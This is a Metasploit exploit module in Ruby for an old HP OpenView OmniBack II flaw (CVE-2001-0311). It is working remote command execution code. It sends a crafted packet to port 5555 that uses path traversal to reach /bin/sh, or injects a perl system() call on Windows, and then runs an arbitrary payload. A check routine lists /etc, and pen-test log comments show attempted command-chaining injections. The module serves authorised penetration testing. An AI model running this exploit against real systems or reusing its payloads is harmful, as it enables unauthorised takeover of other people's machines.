## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'HP OpenView OmniBack II Command Execution', 'Description' => %q{ This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the "unix/cmd/generic" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows. }, 'Author' => [ 'hdm', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2001-0311'], ['OSVDB', '6018'], ['BID', '11032'], ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'], ], 'Platform' => ['unix'], # win 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet', } }, 'Targets' => [ [ 'Unix', { }], [ 'Windows', { }], ], 'DisclosureDate' => '2001-02-28', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(5555) ]) end def check if (target.name =~ /Unix/) connect poof = "\x00\x00\x00.2"+ "\x00 a"+ "\x00 0"+ "\x00 0"+ "\x00 0"+ "\x00 A"+ "\x00 28"+ "\x00/../../../bin/sh"+ "\x00\x00"+ "digit "+ "AAAA\n\x00" sock.put(poof) sock.put("echo /etc/*;\n") res = sock.get_once(-1, 5) disconnect if !(res and res.length > 0) vprint_status("The remote service did not reply to our request") return Exploit::CheckCode::Safe end if (res =~ /passwd|group|resolv/) vprint_status("The remote service is exploitable") return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end if (target.name =~ /Windows/) connect poof = "\x00\x00\x00.2"+ "\x00 a"+ "\x00 0"+ "\x00 0"+ "\x00 0"+ "\x00 A"+ "\x00 28"+ "\x00\\perl.exe"+ "\x00\x20-e\x20system(dir)\x00\x00"+ "digit "+ "AAAA\n\x00" sock.put(poof) res = sock.get_once(-1, 5) disconnect print_status(res.to_s) if !(res and res.length > 0) print_status("The remote service did not reply to our request") return Exploit::CheckCode::Safe end if (res =~ /V.o.l.u.m.e/) #Unicode print_status("The remote service is exploitable") return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end end def exploit if (target.name =~ /Unix/) connect poof = "\x00\x00\x00.2"+ "\x00 a"+ "\x00 0"+ "\x00 0"+ "\x00 0"+ "\x00 A"+ "\x00 28"+ "\x00/../../../bin/sh"+ "\x00\x00"+ "digit "+ "AAAA\n\x00" sock.put(poof) sock.put(payload.encoded + ";\n") res = sock.get_once(-1, 5) if !(res and res.length > 0) print_status("The remote service did not reply to our request") disconnect return end print(res) handler disconnect end if (target.name =~ /Windows/) # aushack # # Tested during pen test against Windows 2003 server. # Windows Service details: # - Data Protector Inet # -> [HP OpenView Storage Data Protector] - Backup client service # -> "C:\Program Files\OmniBack\bin\omniinet.exe" # -> OmniInet service for Windows NT # -> File version: # # This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads. # # Notes: # I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe # Perhaps a difference in Windows/Unix code? Logs: # #11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384 #A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client # #11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384 #[RxNtIntegUtil] parameter refused: ..\foo.exe # #11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384 #A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client # #11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384 #[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c: # #11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384 #A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client # #11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384 #[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir > connect poof = "\x00\x00\x00.2"+ "\x00 a"+ "\x00 0"+ "\x00 0"+ "\x00 0"+ "\x00 A"+ "\x00 28"+ "\x00\\perl.exe"+ "\x00\x20-esystem(#{payload.encoded})\x00\x00"+ "digit "+ "AAAA\n\x00" sock.put(poof) #sock.put(payload.encoded + "\n") res = sock.get_once(-1, 5) if !(res and res.length > 0) print_status("The remote service did not reply to our request") disconnect return end print(res) handler disconnect end end end